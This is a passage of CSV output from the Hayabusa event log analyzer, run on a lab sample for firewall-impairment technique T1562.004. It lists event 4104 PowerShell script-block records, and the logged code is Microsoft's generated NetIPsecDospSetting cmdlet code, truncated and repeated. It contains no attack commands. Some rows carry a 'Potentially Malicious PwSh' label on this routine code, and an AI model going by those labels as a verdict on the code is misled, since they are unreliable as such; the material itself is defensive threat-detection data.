[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType 
= 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { 
[object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 
+09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
